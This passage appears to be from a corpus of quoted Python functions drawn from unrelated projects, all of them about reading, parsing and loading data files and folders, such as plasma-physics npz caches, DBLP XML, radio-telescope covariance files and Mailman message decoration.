only\n # sacrifice is that we can't use shot[1] 0 to be the latest\n # but we could still use shot =[0,0] to be the latest.\n\n # for now, allow - in file names - later we could replace '-' with 'M'\n if isinstance(shot, (tuple, list, ndarray)):\n shot_str = '{s0}_{s1}'.format(s0=shot[0], s1=shot[1])\n else:\n shot_str = str(shot)\n input_data.localname = os.path.join(each_path, '{shot}_{bc}.npz'\n .format(shot=shot_str, bc=bare_chan))\n # original - data_filename %filename_dict)\n files_exist = os.path.exists(input_data.localname)\n if pyfusion.VERBOSE>2: print('search', each_path, 'for', input_data.localname, ['No!','Found!'][files_exist])\n debug_(pyfusion.DEBUG, 3, key='try_local_fetch')\n if files_exist: \n intmp = np.any([st in input_data.localname.lower() for st in \n ['tmp', 'temp']]) # add anything you wish to warn about\n if pyfusion.VERBOSE>0 or intmp:\n if intmp: \n pyfusion.logging.warning('Using {f} in temporary directory!'\n .format(f=input_data.localname))\n print('found local data in {f}'. format(f=input_data.localname))\n break\n\n if not files_exist:\n return None\n\n signal_dict = newload(input_data.localname)\n \"\"\" These W7X-specific lines are here to deal with npz saved data\n See the W7X fetch.py for more info\n Examples of difficult shots.\n 'W7X_L53_LP01_U' shot_number=[20160309,13] 0.8.2b writes all zeros (when \n read by newload 0.9.92O clean,on both) even though the rawdim is OK up to 350,000\n L57 doesn't have this problem in 0.8.2b - written the same date! (but diff dimraw very fragmented)\n \"\"\"\n if 'params' not in signal_dict:\n signal_dict.update(dict(params=()))\n if 'params' in signal_dict and 'name' in signal_dict['params'] and 'W7X_L5' in signal_dict['params']['name']:\n if LooseVersion(signal_dict['params']['pyfusion_version']) < LooseVersion('0.6.8b'):\n raise ValueError('probe assignments in error LP11-22 in {fn}'\n .format(fn=input_data.localname))\n if np.nanmax(signal_dict['timebase']) == 0:\n pyfusion.logging.warning(\"======== all 0's: making a fake timebase for {fn}\"\n .format(fn=input_data.localname))\n signal_dict['timebase'] = 2e-6*np.cumsum(1.0 + 0*signal_dict['signal'])\n\n if np.diff(signal_dict['timebase'])[0] == 0: # first two are the same\n signal_dict['timebase'] = interpolate_corrupted_W7X_timebase(signal_dict)\n\n# if 'req_f_u' not in signal_dict['params']: # req_f_u was initially called seg_f_u (incorrectly)\n# signal_dict['params']['req_f_u'] = signal_dict['params']['shot_f']\n if 'utc_0' in signal_dict['params']:\n true_start = (signal_dict['params']['data_utc'][0] - signal_dict['params']['utc_0'])/1e9\n else:\n true_start = (signal_dict['params']['data_utc'][0] - signal_dict['params']['shot_f'])/1e9 - 61.0\n\n print('\\n base:.py ****True_start of timebase', true_start)\n delta_t = true_start - signal_dict['timebase'][0] \n # used to want timebase starting at zero - changed in 2020 - probably wrong for a long time.\n \n if np.abs(delta_t) > 1e-6:\n if LooseVersion(signal_dict['params']['pyfusion_version']) >= LooseVersion('0.9.94O'): #note the O!\n # not accessible here - if signal_dict['version'] >= 106:\n print('not adjusting')\n else:\n # Ideally the timebase in seconds should be 0 secs at t1 (diag trigger)\n print(\"=== correcting timebase which has not been adjusted to t=0 - discrepancy = {dt:.4g}\"\n .format(dt=delta_t))\n # Note that the relevant version is at the time of saving.\n signal_dict['timebase'] = signal_dict['timebase'] - delta_t\n \n\n coords = get_coords_for_channel(**input_data.__dict__)\n #ch = Channel(bare_chan, Coords('dummy', (0,0,0)))\n ch = Channel(bare_chan, coords)\n output_data = TimeseriesData(timebase=Timebase(signal_dict['timebase']),\n signal=Signal(signal_dict['signal']), channels=ch)\n # bdb - used \"fetcher\" instead of \"self\" in the \"direct from LHD data\" version\n # when using saved files, should use the name - not input_data.config_name\n # it WAS the config_name coming from the raw format.\n output_data.config_name = bare_chan\n # would be nice to get to the gain here - but how - maybe setup will get it\n output_data.meta.update({'shot':input_data.shot})\n if 'params' in signal_dict: \n output_data.params = signal_dict['params']\n if 'utc' in signal_dict['params']:\n output_data.utc = signal_dict['params'].get('utc',None)\n else:\n # yes, it seems like duplication, but no\n output_data.utc = None\n output_data.params = dict(comment = 'old npz file has no params')\n\n # If we are sub-selecting, the utc should be adjusted.\n if time_range is not None:\n origbnds = (output_data.timebase[[0,-1]]/1e-9).astype(np.float) # can't use min max as we want the ends\n output_data = output_data.reduce_time(time_range) # because reduce time can only copy now.\n # ***** this output_data.utc calc only works for non-nan timebase start and ends,\n # and only if the original output_data.utc is correct\n newbnds = (output_data.timebase[[0,-1]]/1e-9).astype(np.float)\n output_data.utc = [output_data.utc[i] + (newbnds[i] - origbnds[i]).round(0) for i in range(2)]\n print('output_data.utc', output_data.utc, newbnds, origbnds)\n\n oldsrc = ', originally from ' + output_data.params['source'] if hasattr(output_data, 'params') and 'source' in output_data.params else ''\n output_data.params.update(dict(source='from npz cache' + oldsrc))\n return(output_data)", "def parsefolder(arg, dirname, names):\n options, computer = arg\n\n names.sort()\n if options.verbose:\n print \"Parsing\", dirname\n for name in names:\n if not os.path.isfile(dirname+\"/\"+name):\n continue\n\n parsefile(dirname, name, options.files, computer)", "def _parse_dir(self):\r\n type_char = self._grab_type()\r\n user_name = self._grab_unascii() #This gets the user_name field for the DirEntity\r\n self._match(\"\\t\")\r\n selector = self._grab_unascii() #This gets the selector.\r\n self._match(\"\\t\")\r\n host = self._grab_host()\r\n self._match(\"\\t\")\r\n port = self._grab_port()\r\n self._match(\"\\r\\n\")\r\n return DirEntity(type_char, user_name, selector, host, port)", "def process_folder(\n self,\n user,\n folder_path,\n data_type,\n overwrite=False,\n extension=\"dat\",\n hugs_url=None,\n storage_url=None,\n ):\n from pathlib import Path\n data_type = data_type.upper()\n\n if data_type == \"GC\":\n filepaths = []\n # Find all files in\n for f in Path(folder_path).glob(\"*.C\"):\n if \"precisions\" in f.name:\n # Remove precisions section and ensure the matching data file exists\n data_filename = str(f).replace(\".precisions\", \"\")\n if Path(data_filename).exists():\n filepaths.append((Path(data_filename), f))\n else:\n filepaths = [f for f in Path(folder_path).glob(f\"**/*.{extension}\")]\n\n return self.process_files(\n user=user,\n files=filepaths,\n data_type=data_type,\n overwrite=overwrite,\n )", "def extract_conversations(output_dir, filename, conversation_separator = '======='):\n key_headers = tuple(['Visitor ID: ', 'Timestamp: '])\n with open(filename,'r') as f:\n for key, group in itertools.groupby(f, lambda line: line.startswith(conversation_separator)):\n if not key:\n group = list(group)\n conversation_key = list(get_key_headers(group, key_headers))\n filename = output_dir + '_'.join(reversed(conversation_key))\n with io.open(filename, 'w', encoding='utf-8') as output:\n conversation = remove_acc(list(extract_dialogue(group)))\n for item in conversation:\n output.write(\"%s\\n\" % item)", "def parse_file_list(self, file_path=None, file_name_id='Producer Granule ID', url_id='Online Access URLs'):\n\n # read in and maintain the raw csv file as df\n df = pd.read_csv(file_path)\n\n # record the number of files\n self.file_num = df.__len__()\n\n # initiate the data frame\n self.file_list = pd.DataFrame()\n self.file_list['download_dir'] = np.NaN\n self.file_list['file_name'] = df[file_name_id]\n self.file_list['online_url'] = df[url_id]\n self.file_list['status'] = 0\n self.file_list['year'] = 0\n self.file_list['day'] = 0\n self.file_list = self.file_list.reset_index(drop=True)\n\n # clean up the variables for a file list downloaded from Reverb\n # extract http urls from the file list\n print(\"Extracting http urls from the file list...\")\n self.file_list['online_url'] = self.file_list['online_url'].str.rstrip(\"\\'\").str.split(',').str[1]\n self.file_list['year'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 7]\n self.file_list['day'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 8]\n self.file_list['download_dir'] = self.download_dir + self.file_list['year'] + '/' + self.file_list['day'] + '/'", "def filings_dir(feedpath):\n\tsubdir = re.fullmatch(r'.*xbrlrss-(\\d{4}-\\d{2})\\.xml',os.path.basename(feedpath)).group(1)\n\treturn os.path.join(feed_tools.filings_dir,subdir)", "def parse(cls, raw_folder: str) -> Dict[str, Any]:\n folder_path = os.path.abspath(raw_folder)\n data = dict()\n files = os.listdir(folder_path)\n for file in files:\n if is_ignored(file):\n continue\n try:\n file = os.path.join(raw_folder, file)\n datum = cls.process_file(file)\n except FileNotCompatible:\n continue\n\n _, kwrd = os.path.split(file)\n kwrd = os.path.splitext(kwrd)[0]\n data[kwrd] = datum\n\n return data", "def _readcvcfolder(self):\n # Initialize\n scanrecinfo = ScanRecInfo()\n samptimeset = []\n freqset = []\n try:\n scanrecinfo.read_scanrec(self.filefolder)\n except Exception:\n warnings.warn(\"Could not read session header.\"\n +\" Will try filefolder name...\")\n try:\n obsfolderinfo = self._parse_cvcfolder(self.filefolder)\n except ValueError as er:\n print(er)\n scanrecinfo.scanrecparms = None\n else:\n spw = obsfolderinfo['rcumode']\n nqz = modeparms.rcumode2nyquistzone(spw)\n sbs = modeparms.seqarg2list(obsfolderinfo['subband'])\n freqspec_hi = modeparms.sb2freq(sbs[-1], nqz)\n scanrecinfo.set_scanrecparms(obsfolderinfo['datatype'],\n str(freqspec_hi),\n obsfolderinfo['duration_tot'],\n obsfolderinfo['pointing'],\n obsfolderinfo['integration'])\n scanrecinfo.scanrecparms['rcumode'] = spw\n scanrecinfo.set_stnid(obsfolderinfo['stnid'])\n scanrecinfo.calibrationfile = None\n print(\"Read in filefolder meta.\")\n # Select only data files in folder (avoid CalTable*.dat files)\n ls = os.listdir(self.filefolder)\n filenames = [filename for filename in ls if filename.endswith('.dat')\n and not filename.startswith('CalTable')]\n filenames.sort() # This enforces chronological order\n for cvcfile in filenames:\n cvcdim_t = (os.path.getsize(os.path.join(self.filefolder, cvcfile))\n // self.__get_cvc_dtype().itemsize)\n # Try to get obsfile header\n try:\n (bfilename, _dat) = cvcfile.split('.')\n ymd, hms, ldattype = bfilename.split('_', 2)\n if '_' in ldattype:\n ldattype, _rest = ldattype.split('_',1)\n hfilename = ymd+'_'+hms+'_'+ldattype+'.h'\n hfilepath = os.path.join(self.filefolder, hfilename)\n obsinfo = LDatInfo.read_ldat_header(hfilepath)\n scanrecinfo.add_obs(obsinfo)\n except:\n warnings.warn(\n \"Couldn't find a header file for {}\".format(cvcfile))\n _datatype, t_begin = self._parse_cvcfile(os.path.join(self.filefolder, cvcfile))\n\n # Compute time of each autocovariance matrix sample per subband\n integration = scanrecinfo.get_integration()\n obscvm_datetimes = [None] * cvcdim_t\n for t_idx in range(cvcdim_t):\n t_delta = datetime.timedelta(\n seconds=t_idx * integration\n )\n obscvm_datetimes[t_idx] = t_begin + t_delta\n samptimeset.append(obscvm_datetimes)\n\n # Compute frequency of corresponding time sample\n rcumode = scanrecinfo.get_rcumode()\n nz = modeparms.rcumode2nyquistzone(rcumode)\n if scanrecinfo.get_datatype() == 'acc':\n freqs = modeparms.rcumode2sbfreqs(rcumode)\n else:\n sb = obsinfo.sb\n freq = modeparms.sb2freq(sb, nz)\n freqs = [freq] * cvcdim_t\n freqset.append(freqs)\n return scanrecinfo, filenames, samptimeset, freqset", "def count_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return count_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return count_users_with_email(item_container)", "def _read_files(self) -> MMD:\n\t\theaders = []\n\t\tbodies = []\n\t\tif self.config.file_type == FileType.CSV:\n\t\t\tif self.config.source_uris.endswith('.zip'):\n\t\t\t\twith ZipFile(self.config.source_uris) as zf:\n\t\t\t\t\tfor item in zf.namelist():\n\t\t\t\t\t\tif item.endswith('.csv'):\n\t\t\t\t\t\t\t# with zf.open(item, 'r') as infile:\n\t\t\t\t\t\t\tcsv_reader = csv.reader(TextIOWrapper(zf.open(item, 'r'), 'utf-8'))\n\t\t\t\t\t\t\theaders.append(next(csv_reader))\n\t\t\t\t\t\t\t# need to find a more efficient way, the csv reader is a generator that can only be used once\n\t\t\t\t\t\t\tbodies.append(list(csv_reader))\n\t\t\telif self.config.source_uris.endswith('.csv'):\n\t\t\t\tfor uri in self.config.source_uris:\n\t\t\t\t\tif uri.endswith('.csv'):\n\t\t\t\t\t\tcsv_reader = csv.reader(open(uri, newline='', encoding='utf-8'))\n\t\t\t\t\t\theaders.append(next(csv_reader))\n\t\t\t\t\t\tbodies.append(list(csv_reader))\n\t\telif self.config.file_type == FileType.CNSCHEMA:\n\t\t\theader = ['@id', 'label_@language', 'label_@value']\n\t\t\tbody = []\n\t\t\twith open(self.config.source_uris, 'r') as load_f:\n\t\t\t\tload_dict = json.load(load_f)\n\t\t\t\theader.extend(load_dict['@context'].keys())\n\t\t\t\theader = [h for h in header if h not in ['label', 'range', 'domain', 'subClassOf']]\n\t\t\t\ttmp_h = [h for h in header if h not in ['@id', '@language', '@value']]\n\t\t\t\tfor item in load_dict['@graph']:\n\t\t\t\t\tif item['@id'].split('/')[-2] == 'resource':\n\t\t\t\t\t\trow = [item['@id'], item['label']['@language'], item['label']['@value']]\n\t\t\t\t\t\tfor h in tmp_h:\n\t\t\t\t\t\t\tif h in item:\n\t\t\t\t\t\t\t\trow.append(item[h])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\trow.append(None)\n\t\t\t\t\t\tbody.append(tuple(row))\n\t\t\theaders.append(tuple(header))\n\t\t\tbodies.append(body)\n\t\telif self.config.file_type == FileType.OPENBASE:\n\t\t\theader = []\n\t\t\tbody = []\n\t\t\twith open(self.config.source_uris, 'r') as load_f:\n\t\t\t\tfor line in load_f:\n\t\t\t\t\trow = []\n\t\t\t\t\tflat_line = flatten_json(json.loads(line))\n\t\t\t\t\tfor key in flat_line:\n\t\t\t\t\t\tif key not in header:\n\t\t\t\t\t\t\theader.append(key)\n\t\t\t\t\tfor h in header:\n\t\t\t\t\t\tif h in flat_line:\n\t\t\t\t\t\t\trow.append(flat_line[h])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trow.append(None)\n\t\t\t\t\tbody.append(row)\n\t\t\tfor item in body:\n\t\t\t\tif len(item) < len(header):\n\t\t\t\t\titem.extend([None for i in range(len(header) - len(item))])\n\t\t\theaders.append(tuple(header))\n\t\t\tbodies.append(tuple([tuple(item) for item in body]))\n\t\telif self.config.file_type == FileType.OPENKS:\n\t\t\t# knowledge graph dataset loading \n\t\t\tif os.path.exists(self.config.source_uris + '/entities') and os.path.exists(self.config.source_uris + '/triples'):\n\t\t\t\theaders = [['entities'], ['triples']]\n\t\t\t\tfor file in ['entities', 'triples']:\n\t\t\t\t\ttmp = []\n\t\t\t\t\twith open(self.config.source_uris + '/' + file, 'r') as load_f:\n\t\t\t\t\t\tfor line in load_f:\n\t\t\t\t\t\t\ttmp.append(tuple([item.strip() for item in line.split('\\t')]))\n\t\t\t\t\t\tbodies.append(tuple(tmp))\n\t\t\t# general text dataset loading\n\t\t\telif os.path.exists(self.config.source_uris + '/train') and os.path.exists(self.config.source_uris + '/valid'):\n\t\t\t\theaders = [['train'], ['valid']]\n\t\t\t\tfor file in ['train', 'valid']:\n\t\t\t\t\ttmp = []\n\t\t\t\t\twith open(self.config.source_uris + '/' + file, 'r') as load_f:\n\t\t\t\t\t\tfor line in load_f:\n\t\t\t\t\t\t\ttmp.append(tuple([item.strip() for item in line.split('@@')]))\n\t\t\t\t\t\tbodies.append(tuple(tmp))\n\t\t\telse:\n\t\t\t\tlogger.warn('Only allows loading with entities and triples for now!')\n\t\t\t\traise IOError\n\t\telif self.config.file_type == FileType.NERO:\n\t\t\theaders = [['unlabeled_data'], ['predict'], ['pattern']]\n\t\t\tfor file in ['unlabeled_data', 'predict', 'pattern']:\n\t\t\t\ttmp = []\n\t\t\t\twith open(self.config.source_uris + '/' + file + '.json', 'r') as load_f:\n\t\t\t\t\tfor line in load_f:\n\t\t\t\t\t\ttmp.append(line.strip())\n\t\t\t\t\tbodies.append(tuple(tmp))\n\n\t\tmmd.name = self.config.data_name\n\t\tmmd.headers = headers\n\t\tmmd.bodies = bodies\n\t\treturn mmd", "def pull_data(self, sub_folder): \n\n data = self.data_interface.load_files_subdirect(sub_folder)\n\n return data", "def load_fvcom_files(filepath=None,casename=None,ncname=None,neifile=None):\n\n currdir=os.getcwd()\n os.chdir(filepath)\n\n data=_load_grdfile(casename)\n\n data.update(_load_depfile(casename))\n \n data.update(_load_spgfile(casename))\n\n data.update(_load_obcfile(casename))\n\n data.update(_load_llfiles(casename))\n\n if ncname!=None:\n data.update(_load_nc(ncname))\n\n if neifile!=None:\n data.update(loadnei(neifile))\n\n os.chdir(currdir)\n\n return data", "def parse_folder(file_folder: str) -> Tuple[list, list, list]:\n\n raw_files = [\n _\n for _ in os.listdir(file_folder)\n if _.lower().endswith(\".raw\") or _.lower().endswith(\".d\") or _.lower().endswith(\".mzml\")\n ]\n fasta_files = [_ for _ in os.listdir(file_folder) if _.lower().endswith(\".fasta\")]\n db_files = [\n _ for _ in os.listdir(file_folder) if _.lower().endswith(\".db_data.hdf\")\n ]\n\n return raw_files, fasta_files, db_files", "def collect_data(self, data_folder):\n print(\"Start collecting\")\n input_file_path = os.path.join(data_folder, \"dblp.xml\")\n with codecs.open(input_file_path, \"r\", encoding=\"iso-8859-1\") as file:\n start = time.time()\n tmp = start\n\n title = \"\"\n key_prefix = \"\"\n authors = []\n personal_information = False\n publications_type = [\"article\", \"inproceedings\", \"proceedings\", \"book\",\n \"incollection\", \"phdthesis\", \"mastersthesis\"]\n start_publication_regex = r\"<([^\\/]*?) (.*)>\" # </article><article mdate=\"2017-05-28\" key=\"journals/acta/Simon83\">\n end_publication_regex = r\"<\\/(.*?)>\" # </article><article mdate=\"2017-05-28\" key=\"journals/acta/Simon83\">\n author_regex = r\"<author>(.*)</author>\" # <author>Katsuyuki Tateishi</author>\n title_regex = r\"<title>(.*)</title>\" # <title>A quadratic speedup theorem ...</title>\n start_person_regex = r'<www.*key=\"(.*)\">' #<www mdate=\"2009-06-10\" key=\"homepages/32/3977\">\n end_person_regex = r\"<\\/www>\"\n note_url_regex = r\"<note.*?>|<url.*?>\"\n inside_publication = False\n inside_person = False\n for i, line in tqdm(enumerate(file)):\n # Test end of publication, if true add publication\n result = regex.search(end_publication_regex, line)\n if result:\n if result.group(1) in publications_type:\n if inside_publication and authors and title:\n # This a a publication, lets add it to the dictionnay author -> title\n self.__add_publication(authors, title)\n title = \"\"\n authors = []\n inside_publication = False\n personal_information = False\n key_prefix = \"\"\n\n #Test beginning of a publication\n result = regex.search(start_publication_regex, line)\n if result and result.group(1) in publications_type:\n inside_publication = True\n title = \"\"\n authors = []\n personal_information = False\n key_prefix = \"\"\n\n #Check if author\n result = regex.search(author_regex, line)\n if result and (inside_publication or inside_person):\n authors.append(result.group(1))\n #Check if title\n result = regex.search(title_regex, line)\n if result and (inside_publication or inside_person):\n title = result.group(1)\n #Check if containt url or note\n result = regex.search(note_url_regex, line)\n if result:\n #if inside_person and (\"<note\" in line or \"<url\" in line):\n personal_information = True\n # Check if end of person, if true add author\n result = regex.search(end_person_regex, line)\n if result and inside_person:\n if authors and \"homepages/\" in key_prefix and title == \"Home Page\":\n self.__add_author(key_prefix, authors, personal_information)\n key_prefix = \"\"\n authors = []\n inside_person = False\n personal_information = False\n title = \"\"\n #Check start person\n result = regex.search(start_person_regex, line)\n if result:\n inside_person = True\n key_prefix = result.group(1)\n\n\n self.__save_everything(data_folder)\n self.__merge_data()\n self.__save_everything(data_folder)", "def _parse_recurring_father_days(days_to_countries,filename=fathers_days_recurring):\n\n\n with open(filename,'r') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('*'):\n date = line[2:]\n else:\n days_to_countries[date].append(line)", "def parse_identifying_data(path, passwd, embedded_file='participants.txt'):\n if path is not None:\n zf = zipfile.ZipFile(path)\n zf.setpassword(passwd)\n\n participants = {}\n for l in zf.read(embedded_file).splitlines():\n if l.startswith('#'):\n continue\n\n bc, name = l.strip().split('\\t')[:2]\n participants[bc] = name.replace(\",\", \"\")\n\n print \"Using identified data!\"\n else:\n participants = None\n\n return participants", "def loadFiles(root=\"data/TAIWAN_RAW_DATA/ADHD\"):\n\tdata_rt = [] # realtime.csv\n\tdata_trial = [] # trialdata.csv\n\tdata_id = [] # caseid/subjectid\n\tRealTime = \"A2RealTime_\"\n\tTrialData = \"A2TrialData_\"\n\tfolder_list = os.listdir(root) # list of subfolders in the root\n\tfor folders in folder_list:\n\t\tfolders_path = os.path.join(root,folders)\n\t\tif folders.find(\"pass\") != -1:\n\t\t\tcontinue\n\t\t\t\n\t\ttry:\n\t\t\tdata_rt.append(pd.read_csv(os.path.join\n\t\t\t\t\t\t\t\t (folders_path,\n\t\t\t\t\t\t\t\t RealTime+folders[3:]+\".csv\")))\n\t\t\tdata_trial.append(pd.read_csv(os.path.join\n\t\t\t\t\t\t\t\t\t (folders_path,\n\t\t\t\t\t\t\t\t\t TrialData+folders[3:]+\".csv\")))\n\t\t\tdata_id.append(int(folders.split('_')[1]))\n\t\texcept:\n\t\t\tprint(os.path.join(folders_path,TrialData+folders[3:]+\".csv\"))\n\t\t\t\n\treturn data_rt,data_trial,data_id,folder_list", "def handle_fbl(message, vendor=None, host=None):\n logger.debug('Got FBL vendor=%s host=%s', vendor, host)\n #logger.debug('message=%s', message)\n #logger.debug('message_type=%s', type(message))\n\n \"\"\"\n ARF is acronym-speak for three standardized MIME sections:\n 1) Generic message from FBL vendor\n - \"This is an abuse report\", etc\n 2) Generic information about abuse report\n - Contains some info, but not enough to be useful.\n 3) Copy of the original message\n - Some providers ALTER the original message, say:\n * Removal of Return-Path\n So keep that in mind. So far Message-ID has been untouched.\n \"\"\"\n\n # Convert to email.message.Message\n msg = message.to_message()\n # Get body\n body = msg.get_payload()\n # Yank out the original message\n try:\n original_msg = body[2].get_payload()[0]\n except AttributeError, e:\n logger.error('Could not parse FBL as ARF: %s', e)\n return\n\n #campaign_uuid = str(original_msg.get('List-Id'))\n #m = re.match(r'^[a-f\\d]{8}-([a-f\\d]{4}-){3}[a-f\\d]{12}$', campaign_uuid, re.IGNORECASE)\n #if not campaign_uuid or not m:\n # logger.error(\"FBL report original message does not contain a valid List-Id header: %s\", campaign_uuid)\n # return\n #campaign_uuid = uuid.UUID(campaign_uuid)\n #logger.debug('campaign_uuid=%s', campaign_uuid)\n\n list_index = str(original_msg.get('List-Id'))\n # TODO This regex doesn't belong here. It will be forgotten about.\n m = re.match(r'^([a-f\\d]{8,64})-(\\d{1,8})$', list_index, re.IGNORECASE)\n if not list_index or not m:\n logger.error(\"FBL report original message does not contain a valid List-Id header: %s\", list_index)\n return\n campaign_pk, r_index = m.groups()\n r_index = int(r_index)\n logger.debug('campaign_pk=%s, r_index=%s', campaign_pk, r_index)\n\n campaign = get_campaign('emails', pk=campaign_pk)\n r = campaign.recipients[r_index]\n logger.info(\"Got FBL for Campaign %s: %s (vendor=%s)\", campaign, r.email, vendor)\n r.append_log(fbl=True, blocked=True, msg=\"FBL report from vendor: %s\" % vendor)\n\n #logger.debug('original_msg=%s', original_msg)\n #logger.debug('original_msg_repr=%s', original_msg.__repr__())\n\n return_path = original_msg.get('Return-Path')\n message_id = original_msg.get('Message-Id')\n logger.debug('return_path=%s, message_id=%s', return_path, message_id)", "def process(mlist, msg, msgdata):\n # Digests and Mailman-craft messages should not get additional headers.\n if msgdata.get('isdigest') or msgdata.get('nodecorate'):\n return\n d = {}\n member = msgdata.get('member')\n if member is not None:\n # Calculate the extra personalization dictionary.\n recipient = msgdata.get('recipient', member.address.original_email)\n d['member'] = formataddr(\n (member.subscriber.display_name, member.subscriber.email))\n d['user_email'] = recipient\n d['user_delivered_to'] = member.address.original_email\n d['user_language'] = member.preferred_language.description\n d['user_name'] = member.display_name\n # For backward compatibility.\n d['user_address'] = recipient\n # Calculate the archiver permalink substitution variables. This provides\n # the $<archive-name>_url placeholder for every enabled archiver.\n for archiver in IListArchiverSet(mlist).archivers:\n if archiver.is_enabled:\n # Get the permalink of the message from the archiver. Watch out\n # for exceptions in the archiver plugin.\n try:\n archive_url = archiver.system_archiver.permalink(mlist, msg)\n except Exception:\n alog.exception('Exception in \"{}\" archiver'.format(\n archiver.system_archiver.name))\n archive_url = None\n if archive_url is not None:\n placeholder = '{}_url'.format(archiver.system_archiver.name)\n d[placeholder] = archive_url\n # These strings are descriptive for the log file and shouldn't be i18n'd\n d.update(msgdata.get('decoration-data', {}))\n header = decorate('list:member:regular:header', mlist, d)\n footer = decorate('list:member:regular:footer', mlist, d)\n # Escape hatch if both the footer and header are empty or None.\n if len(header) == 0 and len(footer) == 0:\n return\n # Be MIME smart here. We only attach the header and footer by\n # concatenation when the message is a non-multipart of type text/plain.\n # Otherwise, if it is not a multipart, we make it a multipart, and then we\n # add the header and footer as text/plain parts.\n #\n # BJG: In addition, only add the footer if the message's character set\n # matches the charset of the list's preferred language. This is a\n # suboptimal solution, and should be solved by allowing a list to have\n # multiple headers/footers, for each language the list supports.\n #\n # Also, if the list's preferred charset is us-ascii, we can always\n # safely add the header/footer to a plain text message since all\n # charsets Mailman supports are strict supersets of us-ascii --\n # no, UTF-16 emails are not supported yet.\n #\n # TK: Message with 'charset=' cause trouble. So, instead of\n # mgs.get_content_charset('us-ascii') ...\n mcset = msg.get_content_charset() or 'us-ascii'\n lcset = mlist.preferred_language.charset\n msgtype = msg.get_content_type()\n # BAW: If the charsets don't match, should we add the header and footer by\n # MIME multipart chroming the message?\n wrap = True\n if not msg.is_multipart() and msgtype == 'text/plain':\n # Save the RFC-3676 format parameters.\n format_param = msg.get_param('format')\n delsp = msg.get_param('delsp')\n # Save 'Content-Transfer-Encoding' header in case decoration fails.\n cte = msg.get('content-transfer-encoding')\n # header/footer is now in unicode.\n try:\n oldpayload = msg.get_payload(decode=True).decode(mcset)\n del msg['content-transfer-encoding']\n frontsep = endsep = ''\n if len(header) > 0 and not header.endswith('\\n'):\n frontsep = '\\n'\n if len(footer) > 0 and not oldpayload.endswith('\\n'):\n endsep = '\\n'\n payload = header + frontsep + oldpayload + endsep + footer\n # When setting the payload for the message, try various charset\n # encodings until one does not produce a UnicodeError. We'll try\n # charsets in this order: the list's charset, the message's\n # charset, then utf-8. It's okay if some of these are duplicates.\n for cset in (lcset, mcset, 'utf-8'):\n try:\n msg.set_payload(payload.encode(cset), cset)\n except UnicodeError:\n pass\n else:\n if format_param:\n msg.set_param('format', format_param)\n if delsp:\n msg.set_param('delsp', delsp)\n wrap = False\n break\n except (LookupError, UnicodeError):\n if cte:\n # Restore the original c-t-e.\n del msg['content-transfer-encoding']\n msg['Content-Transfer-Encoding'] = cte\n elif msg.get_content_type() == 'multipart/mixed':\n # The next easiest thing to do is just prepend the header and append\n # the footer as additional subparts\n payload = msg.get_payload()\n if not isinstance(payload, list):\n payload = [payload]\n if len(footer) > 0:\n mimeftr = MIMEText(footer.encode(lcset), 'plain', lcset)\n mimeftr['Content-Disposition'] = 'inline'\n payload.append(mimeftr)\n if len(header) > 0:\n mimehdr = MIMEText(header.encode(lcset), 'plain', lcset)\n mimehdr['Content-Disposition'] = 'inline'\n payload.insert(0, mimehdr)\n msg.set_payload(payload)\n wrap = False\n # If we couldn't add the header or footer in a less intrusive way, we can\n # at least do it by MIME encapsulation. We want to keep as much of the\n # outer chrome as possible.\n if not wrap:\n return\n # Because of the way Message objects are passed around to process(), we\n # need to play tricks with the outer message -- i.e. the outer one must\n # remain the same instance. So we're going to create a clone of the outer\n # message, with all the header chrome intact, then copy the payload to it.\n # This will give us a clone of the original message, and it will form the\n # basis of the interior, wrapped Message.\n inner = Message()\n # Which headers to copy? Let's just do the Content-* headers\n for h, v in msg.items():\n if h.lower().startswith('content-'):\n inner[h] = v\n inner.set_payload(msg.get_payload())\n # For completeness\n inner.set_unixfrom(msg.get_unixfrom())\n inner.preamble = msg.preamble\n inner.epilogue = msg.epilogue\n # Don't copy get_charset, as this might be None, even if\n # get_content_charset isn't. However, do make sure there is a default\n # content-type, even if the original message was not MIME.\n inner.set_default_type(msg.get_default_type())\n # BAW: HACK ALERT.\n if hasattr(msg, '__version__'):\n inner.__version__ = msg.__version__\n # Now, play games with the outer message to make it contain three\n # subparts: the header (if any), the wrapped message, and the footer (if\n # any).\n payload = [inner]\n if len(header) > 0:\n mimehdr = MIMEText(header.encode(lcset), 'plain', lcset)\n mimehdr['Content-Disposition'] = 'inline'\n payload.insert(0, mimehdr)\n if len(footer) > 0:\n mimeftr = MIMEText(footer.encode(lcset), 'plain', lcset)\n mimeftr['Content-Disposition'] = 'inline'\n payload.append(mimeftr)\n msg.set_payload(payload)\n del msg['content-type']\n del msg['content-transfer-encoding']\n del msg['content-disposition']\n msg['Content-Type'] = 'multipart/mixed'", "def process_data_group(folder:Path, type:str, light:bool = False) -> dict:\n\n if type == dm.Delivery:\n data_folder = folder / 'data'\n else:\n data_folder = folder\n\n # check for non-existent or empty folder\n if not data_folder.exists():\n raise FileNotFoundError\n try:\n next((data_folder).glob(\"**/*\"))\n except StopIteration:\n # folder is empty can't process it\n raise FileNotFoundError\n\n # Get file sizes, last modified dates, and names to count,\n # sum size, and hash the file data provided\n file_sizes, file_modified_dates, file_metamodified_dates, file_names = zip(\n *[\n (f.stat().st_size, f.stat().st_mtime, f.stat().st_ctime, f)\n for f in (data_folder).glob(\"**/*\")\n if f.is_file() and f.name != 'receipt.rst'\n ]\n )\n\n last_modified = datetime.fromtimestamp(\n max(max(file_modified_dates),\n max(file_metamodified_dates)))\n\n # Hash the files in the delivery\n if light:\n folder_hash = 'skipped'\n else:\n folder_hash = hash_files(file_names)\n\n dg = {\n 'name' : folder.name,\n 'type' : type.__name__,\n 'last_update' : datetime.now(),\n 'size' : sum(file_sizes),\n 'num_files' : len(file_sizes),\n 'group_hash' : folder_hash,\n 'group_last_modified' : last_modified,\n }\n\n return dg", "def fdparse(cls, value):\n try:\n q = cls.rgxl\n except AttributeError:\n cls.rgxl = re.compile(\"(.)([r-][w-][x-]){3}(\\s+\\S+){3}\" +\n 